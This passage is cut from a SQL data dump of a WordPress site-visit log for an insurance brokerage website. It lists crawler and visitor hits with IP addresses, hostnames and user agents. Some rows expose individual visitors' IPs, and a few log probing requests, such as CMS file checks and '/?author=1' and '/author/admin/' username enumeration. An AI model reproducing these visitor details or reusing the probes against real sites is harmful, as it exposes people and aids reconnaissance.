Spider','','','','0','0',0),(22944,'0b_46974283ceb11dddcb1f5095c7172e55','1462053678','157.55.39.38','msnbot-157-55-39-38.search.msn.com','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(22946,'0b_a821c7c25954f78d429abc232f3e8a24','1462053802','66.249.64.29','crawl-66-249-64-29.googlebot.com','/','SAMSUNG-SGH-E250/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot-Mobile','','','','0','0',0),(22949,'0b_abcd2084f0f0a1cfa04a1d1735b4ae62','1462060512','54.91.16.247','ec2-54-91-16-247.compute-1.amazonaws.com','/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/537.11 (KHTML, like Gecko)(compatible; http://url-validation.citygrid.com/) Chrome/23.0.1271.95 Safari/537.11','','',0,'MacOSX','Google Chrome','','','','Unknown Spider','','','','0','0',0),(22952,'0b_b4c6b209f1c7c531695be8bb4e06f38f','1462060805','207.46.13.97','msnbot-207-46-13-97.search.msn.com','/register/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(22953,'0b_06f0fc1b74447fe7eec3a9a60bde5c27','1462064598','178.137.83.178','178-137-83-178-lvv.broadband.kyivstar.net','/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MyIE2; Deepnet Explorer)','http://inzn.ru/','',0,'WinXP','IE 6','','','','','','','','0','0',0),(22955,'0b_06f0fc1b74447fe7eec3a9a60bde5c27','1462064598','178.137.83.178','178-137-83-178-lvv.broadband.kyivstar.net','/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MyIE2; Deepnet Explorer)','http://inzn.ru/','',0,'WinXP','IE 6','','','','','','','','0','0',0),(22958,'0b_37e8543783eec149c2b5ecf7ed9b6365','1462068344','220.181.108.149','baiduspider-220-181-108-149.crawl.baidu.com','/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','cn','','','Baiduspider','','','','0','0',0),(22961,'0b_8359a3609ddb729215440893d472c90f','1462069428','207.46.13.97','msnbot-207-46-13-97.search.msn.com','/igo/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(22964,'0b_c23308a4867ac82a1ee6c64f1cbf2916','1462073076','40.77.167.88','msnbot-40-77-167-88.search.msn.com','/agent-tools/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(22967,'0b_57dc1de3aa1570d7b34484e6cb27c2d1','1462073095','178.137.83.178','178-137-83-178-lvv.broadband.kyivstar.net','/','Opera/9.0 (Windows NT 5.1; U; en)','http://zarabotat-na-sajte.ru/','',0,'WinXP','Opera 9','us','','','','','','','0','0',0),(22968,'0b_70c0cf9419485a5ca21e4a39ba311ba2','1462075506','86.122.244.157','86-122-244-157.rdsnet.ro','/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0','https://www.google.com','_notprovided_',1,'Win7 x64','Firefox 44','ro','','www.google.com','','','','','0','0',0),(22970,'0b_7805b46db94a1dd7aaa0a55cc9285902','1462075557','86.122.244.157','86-122-244-157.rdsnet.ro','/','Go-http-client/1.1','http://empireins.com/','',0,'','','ro','','','Go','','','','0','0',0),(22973,'0b_f54ecca86480defbb66fa4371b9c4c01','1462077464','180.76.15.158','baiduspider-180-76-15-158.crawl.baidu.com','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(22974,'0b_f53ccd73a3afc3a00bb3178f24fffb3e','1462079898','157.55.39.38','msnbot-157-55-39-38.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(22977,'0b_361cc9fa6836524c9a6564fd4d67c94d','1462081483','180.76.15.31','baiduspider-180-76-15-31.crawl.baidu.com','/forms/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(22979,'0b_c22ad3f1d4a7f6781b6fa8230cc1ccd9','1462084602','144.76.100.175','blexhn52.webmeup.com','/robots.txt','Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)','','',0,'','','','','','Unknown Spider','','','','3','0',0),(22980,'0b_c22ad3f1d4a7f6781b6fa8230cc1ccd9','1462084604','144.76.100.175','blexhn52.webmeup.com','/','Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)','','',0,'','','','','','','','','','3','0',0),(22983,'0b_c22ad3f1d4a7f6781b6fa8230cc1ccd9','1462084619','144.76.100.175','blexhn52.webmeup.com','/about-us/','Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)','','',0,'','','','','','','','','','3','0',0),(22986,'0b_c22ad3f1d4a7f6781b6fa8230cc1ccd9','1462084643','144.76.100.175','blexhn52.webmeup.com','/agent-tools/','Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)','','',0,'','','','','','','','','','3','0',0),(22989,'0b_c22ad3f1d4a7f6781b6fa8230cc1ccd9','1462084665','144.76.100.175','blexhn52.webmeup.com','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)','','',0,'','','','','','','','','','3','0',0),(22991,'0b_c22ad3f1d4a7f6781b6fa8230cc1ccd9','1462084685','144.76.100.175','blexhn52.webmeup.com','/carriers/','Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)','','',0,'','','','','','','','','','3','0',0),(22992,'0b_c22ad3f1d4a7f6781b6fa8230cc1ccd9','1462084698','144.76.100.175','blexhn52.webmeup.com','/case-status/','Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)','','',0,'','','','','','','','','','3','0',0),(22995,'0b_c22ad3f1d4a7f6781b6fa8230cc1ccd9','1462084704','144.76.100.175','blexhn52.webmeup.com','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)','','',0,'','','','','','','','','','3','0',0),(22998,'0b_2963641cd998493d1b441c815ed6f351','1462084728','207.46.13.129','msnbot-207-46-13-129.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(23001,'0b_c22ad3f1d4a7f6781b6fa8230cc1ccd9','1462084728','144.76.100.175','blexhn52.webmeup.com','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)','','',0,'','','','','','','','','','3','0',0),(23004,'0b_2963641cd998493d1b441c815ed6f351','1462084732','207.46.13.129','msnbot-207-46-13-129.search.msn.com','/licensing-contracting/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(23006,'0b_c22ad3f1d4a7f6781b6fa8230cc1ccd9','1462084744','144.76.100.175','blexhn52.webmeup.com','/contact/','Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)','','',0,'','','','','','','','','','3','0',0),(23009,'0b_c22ad3f1d4a7f6781b6fa8230cc1ccd9','1462084766','144.76.100.175','blexhn52.webmeup.com','/forms/','Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)','','',0,'','','','','','','','','','3','0',0),(23010,'0b_c22ad3f1d4a7f6781b6fa8230cc1ccd9','1462084788','144.76.100.175','blexhn52.webmeup.com','/igo/','Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)','','',0,'','','','','','','','','','3','0',0),(23012,'0b_c22ad3f1d4a7f6781b6fa8230cc1ccd9','1462084816','144.76.100.175','blexhn52.webmeup.com','/insentives/','Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)','','',0,'','','','','','','','','','3','0',0),(23015,'0b_c22ad3f1d4a7f6781b6fa8230cc1ccd9','1462084832','144.76.100.175','blexhn52.webmeup.com','/licensing-contracting/','Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)','','',0,'','','','','','','','','','3','0',0),(23016,'0b_c22ad3f1d4a7f6781b6fa8230cc1ccd9','1462084842','144.76.100.175','blexhn52.webmeup.com','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)','','',0,'','','','','','','','','','3','0',0),(23018,'0b_c22ad3f1d4a7f6781b6fa8230cc1ccd9','1462084855','144.76.100.175','blexhn52.webmeup.com','/register/','Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)','','',0,'','','','','','','','','','3','0',0),(23019,'0b_c22ad3f1d4a7f6781b6fa8230cc1ccd9','1462084880','144.76.100.175','blexhn52.webmeup.com','/term-quotes/','Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)','','',0,'','','','','','','','','','3','0',0),(23021,'0b_1d480572a515ced60bf136cbedb43d4e','1462084887','66.249.64.24','crawl-66-249-64-24.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(23022,'0b_c22ad3f1d4a7f6781b6fa8230cc1ccd9','1462084897','144.76.100.175','blexhn52.webmeup.com','/?page_id=169','Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)','','',0,'','','','','','','','','','3','0',0),(23025,'0b_c22ad3f1d4a7f6781b6fa8230cc1ccd9','1462084925','144.76.100.175','blexhn52.webmeup.com','/?page_id=171?a=pwdreset','Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)','','',0,'','','','','','','','','','3','0',0),(23028,'0b_c22ad3f1d4a7f6781b6fa8230cc1ccd9','1462084949','144.76.100.175','blexhn52.webmeup.com','/about-us/meet-the-eib-team/','Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)','','',0,'','','','','','','','','','3','0',0),(23030,'0b_983d2de630577faa7effcbdd0df8d8da','1462085431','207.46.13.34','msnbot-207-46-13-34.search.msn.com','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(23031,'0b_8dea79e6bb7f0be56299d8ffaea0af78','1462088427','103.248.174.124','103.248.174.124','/','Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/14.1.119979954 Mobile/13E238 Safari/600.1.4','https://www.google.co.in/','_notprovided_',1,'iPhone OS','GSA 14 Mobile','gb','','Google IN','','','','','0','0',0),(23033,'0b_8dea79e6bb7f0be56299d8ffaea0af78','1462088440','103.248.174.124','103.248.174.124','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/14.1.119979954 Mobile/13E238 Safari/600.1.4','http://www.empireins.com/','',0,'iPhone OS','GSA 14 Mobile','gb','','','','','','','0','0',0),(23034,'0b_d41f20a5339dbf15852ee9664bda39c3','1462090163','103.248.174.124','103.248.174.124','/','Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/14.1.119979954 Mobile/13E238 Safari/600.1.4','http://www.empireins.com/','',0,'iPhone OS','GSA 14 Mobile','gb','375 x 667','','','','','','0','0',0),(23036,'0b_7665b524dab47950d702b22ed531c0db','1462090756','221.231.6.195','221.231.6.195','/templets/default/style/dedecms.css','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','http://empireins.com','',0,'','','cn','','','Spoofer bot','','','','0','0',0),(23039,'0b_6e3c9df20f7042a7dbd604c2a60f708b','1462091598','207.46.13.97','msnbot-207-46-13-97.search.msn.com','/register/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(23042,'0b_8d88c3bbc01b71a1a2abb674b9dfb86c','1462093445','208.115.111.66','208-115-111-66-reverse.wowrack.com','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(23043,'0b_858032af870cf039350ce34d51d7f5b2','1462094147','141.8.143.235','spider-141-8-143-235.yandex.com','/robots.txt','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','','','','Yandex','','','','0','0',0),(23046,'0b_f97bc1ede4733888b05002cfdc9fc62e','1462094214','207.46.13.34','msnbot-207-46-13-34.search.msn.com','/agent-tools/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(23048,'0b_e2ac3f572d967630467822180fad6321','1462095869','157.55.39.38','msnbot-157-55-39-38.search.msn.com','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(23049,'0b_942d6938239bd3256a67a2a9bf73d60c','1462097325','208.43.225.84','54.e1.2bd0.ip4.static.sl-reverse.com','/robots.txt','Mozilla/5.0 (compatible; SiteExplorer/1.0b; +http://siteexplorer.info/)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(23051,'0b_942d6938239bd3256a67a2a9bf73d60c','1462097333','208.43.225.84','54.e1.2bd0.ip4.static.sl-reverse.com','/term-quotes/','Mozilla/5.0 (compatible; SiteExplorer/1.0b; +http://siteexplorer.info/)','','',0,'','','','','','','','','','0','0',0),(23054,'0b_942d6938239bd3256a67a2a9bf73d60c','1462097343','208.43.225.84','54.e1.2bd0.ip4.static.sl-reverse.com','/register/','Mozilla/5.0 (compatible; SiteExplorer/1.0b; +http://siteexplorer.info/)','','',0,'','','','','','','','','','0','0',0),(23057,'0b_942d6938239bd3256a67a2a9bf73d60c','1462097350','208.43.225.84','54.e1.2bd0.ip4.static.sl-reverse.com','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; SiteExplorer/1.0b; +http://siteexplorer.info/)','','',0,'','','','','','','','','','0','0',0),(23058,'0b_942d6938239bd3256a67a2a9bf73d60c','1462097361','208.43.225.84','54.e1.2bd0.ip4.static.sl-reverse.com','/licensing-contracting/','Mozilla/5.0 (compatible; SiteExplorer/1.0b; +http://siteexplorer.info/)','','',0,'','','','','','','','','','0','0',0),(23061,'0b_942d6938239bd3256a67a2a9bf73d60c','1462097368','208.43.225.84','54.e1.2bd0.ip4.static.sl-reverse.com','/insentives/','Mozilla/5.0 (compatible; SiteExplorer/1.0b; +http://siteexplorer.info/)','','',0,'','','','','','','','','','0','0',0),(23064,'0b_942d6938239bd3256a67a2a9bf73d60c','1462097375','208.43.225.84','54.e1.2bd0.ip4.static.sl-reverse.com','/igo/','Mozilla/5.0 (compatible; SiteExplorer/1.0b; +http://siteexplorer.info/)','','',0,'','','','','','','','','','0','0',0),(23067,'0b_942d6938239bd3256a67a2a9bf73d60c','1462097383','208.43.225.84','54.e1.2bd0.ip4.static.sl-reverse.com','/forms/','Mozilla/5.0 (compatible; SiteExplorer/1.0b; +http://siteexplorer.info/)','','',0,'','','','','','','','','','0','0',0),(23069,'0b_942d6938239bd3256a67a2a9bf73d60c','1462097391','208.43.225.84','54.e1.2bd0.ip4.static.sl-reverse.com','/contact/','Mozilla/5.0 (compatible; SiteExplorer/1.0b; +http://siteexplorer.info/)','','',0,'','','','','','','','','','0','0',0),(23072,'0b_942d6938239bd3256a67a2a9bf73d60c','1462097399','208.43.225.84','54.e1.2bd0.ip4.static.sl-reverse.com','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (compatible; SiteExplorer/1.0b; +http://siteexplorer.info/)','','',0,'','','','','','','','','','0','0',0),(23075,'0b_942d6938239bd3256a67a2a9bf73d60c','1462097406','208.43.225.84','54.e1.2bd0.ip4.static.sl-reverse.com','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (compatible; SiteExplorer/1.0b; +http://siteexplorer.info/)','','',0,'','','','','','','','','','0','0',0),(23076,'0b_942d6938239bd3256a67a2a9bf73d60c','1462097413','208.43.225.84','54.e1.2bd0.ip4.static.sl-reverse.com','/case-status/','Mozilla/5.0 (compatible; SiteExplorer/1.0b; +http://siteexplorer.info/)','','',0,'','','','','','','','','','0','0',0),(23079,'0b_942d6938239bd3256a67a2a9bf73d60c','1462097420','208.43.225.84','54.e1.2bd0.ip4.static.sl-reverse.com','/carriers/','Mozilla/5.0 (compatible; SiteExplorer/1.0b; +http://siteexplorer.info/)','','',0,'','','','','','','','','','0','0',0),(23081,'0b_942d6938239bd3256a67a2a9bf73d60c','1462097430','208.43.225.84','54.e1.2bd0.ip4.static.sl-reverse.com','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (compatible; SiteExplorer/1.0b; +http://siteexplorer.info/)','','',0,'','','','','','','','','','0','0',0),(23082,'0b_942d6938239bd3256a67a2a9bf73d60c','1462097437','208.43.225.84','54.e1.2bd0.ip4.static.sl-reverse.com','/agent-tools/','Mozilla/5.0 (compatible; SiteExplorer/1.0b; +http://siteexplorer.info/)','','',0,'','','','','','','','','','0','0',0),(23084,'0b_942d6938239bd3256a67a2a9bf73d60c','1462097444','208.43.225.84','54.e1.2bd0.ip4.static.sl-reverse.com','/about-us/','Mozilla/5.0 (compatible; SiteExplorer/1.0b; +http://siteexplorer.info/)','','',0,'','','','','','','','','','0','0',0),(23087,'0b_c6e2c1816898c9094952947980ae2b8a','1462098221','207.46.13.129','msnbot-207-46-13-129.search.msn.com','/contact/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(23090,'0b_bb5d395ad9f5b00faff76157a4317a7b','1462098852','66.249.64.29','crawl-66-249-64-29.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(23091,'0b_bb5d395ad9f5b00faff76157a4317a7b','1462098877','66.249.64.29','crawl-66-249-64-29.googlebot.com','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'Android','','','','','Googlebot-Mobile','','','','0','0',0),(23094,'0b_397f2c86afd4840395dfb9893ddb221f','1462099594','208.115.111.66','208-115-111-66-reverse.wowrack.com','/members/feed/','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(23096,'0b_528b2aba9fa4a0b17d1b3d514da2a1f5','1462100651','141.8.143.235','spider-141-8-143-235.yandex.com','/robots.txt','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','','','','Yandex','','','','0','0',0),(23097,'0b_528b2aba9fa4a0b17d1b3d514da2a1f5','1462100654','141.8.143.235','spider-141-8-143-235.yandex.com','/top.html','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(23100,'0b_3771ce41cf59ec8cef2467a053a93507','1462104106','207.46.13.97','msnbot-207-46-13-97.search.msn.com','/igo/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(23103,'0b_18254562f9d73c77d3ffcaeac56e5a36','1462104511','144.76.87.119','n8g1.007ac9.net','/','Mozilla/5.0 (compatible; 007ac9 Crawler; http://crawler.007ac9.net/)','','',0,'','','','','','','','','','0','0',0),(23105,'0b_18254562f9d73c77d3ffcaeac56e5a36','1462104514','144.76.87.119','n8g1.007ac9.net','/robots.txt','Mozilla/5.0 (compatible; 007ac9 Crawler; http://crawler.007ac9.net/)','','',0,'','','','','','','','','','0','0',0),(23108,'0b_18254562f9d73c77d3ffcaeac56e5a36','1462104514','144.76.87.119','n8g1.007ac9.net','/','Mozilla/5.0 (compatible; 007ac9 Crawler; http://crawler.007ac9.net/)','','',0,'','','','','','','','','','0','0',0),(23111,'0b_973a16a216e366f5a398a28c317c5775','1462106849','37.115.184.150','37-115-184-150-broadband.kyivstar.net','/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MRA 4.3 (build 01218); .NET CLR 1.1.4322)','http://www.foxinsocks.ru/','',0,'WinXP','IE 6','','','','','','','','0','0',0),(23114,'0b_973a16a216e366f5a398a28c317c5775','1462106849','37.115.184.150','37-115-184-150-broadband.kyivstar.net','/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MRA 4.3 (build 01218); .NET CLR 1.1.4322)','http://www.foxinsocks.ru/','',0,'WinXP','IE 6','','','','','','','','0','0',0),(23115,'0b_d4fffe720c1c1bc1ebfaebee186a2548','1462107872','208.115.111.66','208-115-111-66-reverse.wowrack.com','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(23118,'0b_514b285680a7216ecbdbadca90fc7b1c','1462108794','100.43.81.146','spider-100-43-81-146.yandex.com','/top.html','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','tr','','','Yandex','','','','0','0',0),(23121,'0b_b5521e44e8f6d230a387887bf3eb09cc','1462108995','100.43.91.1','spider-100-43-91-1.yandex.com','/top.html','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(23123,'0b_990184483f768ed6945ffefd8157e55d','1462108998','199.21.99.194','spider-199-21-99-194.yandex.com','/carriers/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(23126,'0b_c9854c6fceb0423dc50347ce53bdbde8','1462111099','207.46.13.127','msnbot-207-46-13-127.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(23127,'0b_d8dc6c6fb833737eaaa5d28eb73403bf','1462111556','51.254.121.185','185.ip-51-254-121.eu','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(23129,'0b_d8dc6c6fb833737eaaa5d28eb73403bf','1462111560','51.254.121.185','185.ip-51-254-121.eu','/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(23130,'0b_780d029e99aa1945164acf77867cae9f','1462113751','208.115.111.66','208-115-111-66-reverse.wowrack.com','/home/feed/','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(23133,'0b_b7041a095343511726021036bd09cf0d','1462114257','207.46.13.34','msnbot-207-46-13-34.search.msn.com','/about-us/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(23136,'0b_06165e6c6b929458a476d982f6a145dd','1462114889','184.154.139.23','placeholder.sitelock.com','/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(23138,'0b_06165e6c6b929458a476d982f6a145dd','1462114901','184.154.139.23','placeholder.sitelock.com','/th1s_1s_a_4o4.html','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(23139,'0b_06165e6c6b929458a476d982f6a145dd','1462114904','184.154.139.23','placeholder.sitelock.com','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(23141,'0b_1998a1124f5f058194ba6aff361e5891','1462114993','208.115.111.66','208-115-111-66-reverse.wowrack.com','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(23144,'0b_4c9e3e5c19afa7bbf5680437221adbb7','1462116158','207.46.13.129','msnbot-207-46-13-129.search.msn.com','/licensing-contracting/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(23147,'0b_1ae54d630f46033bc980ef269ddf7933','1462116905','66.249.64.29','crawl-66-249-64-29.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(23148,'0b_09e7a84895adec73f77d2ffcb3921158','1462116966','5.9.62.130','static.130.62.9.5.clients.your-server.de','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(23151,'0b_09e7a84895adec73f77d2ffcb3921158','1462116969','5.9.62.130','static.130.62.9.5.clients.your-server.de','/SSO/235_14.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(23153,'0b_09e7a84895adec73f77d2ffcb3921158','1462116972','5.9.62.130','static.130.62.9.5.clients.your-server.de','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(23154,'0b_09e7a84895adec73f77d2ffcb3921158','1462116974','5.9.62.130','static.130.62.9.5.clients.your-server.de','/SSO/235_14.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(23156,'0b_09e7a84895adec73f77d2ffcb3921158','1462116984','5.9.62.130','static.130.62.9.5.clients.your-server.de','/SSO/235_19.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(23157,'0b_09e7a84895adec73f77d2ffcb3921158','1462116989','5.9.62.130','static.130.62.9.5.clients.your-server.de','/resources.htm','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(23159,'0b_09e7a84895adec73f77d2ffcb3921158','1462116992','5.9.62.130','static.130.62.9.5.clients.your-server.de','/?p=283','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(23160,'0b_09e7a84895adec73f77d2ffcb3921158','1462116994','5.9.62.130','static.130.62.9.5.clients.your-server.de','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(23162,'0b_19087429848a9a666067df1258a8747d','1462119057','207.46.13.34','msnbot-207-46-13-34.search.msn.com','/term-quotes/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(23163,'0b_e38b143c2c7d83a895770ba66535a1b2','1462119612','195.154.199.235','electro.az-streamingserver.com','/?author=1','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(23165,'0b_e38b143c2c7d83a895770ba66535a1b2','1462119613','195.154.199.235','electro.az-streamingserver.com','/author/admin/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; 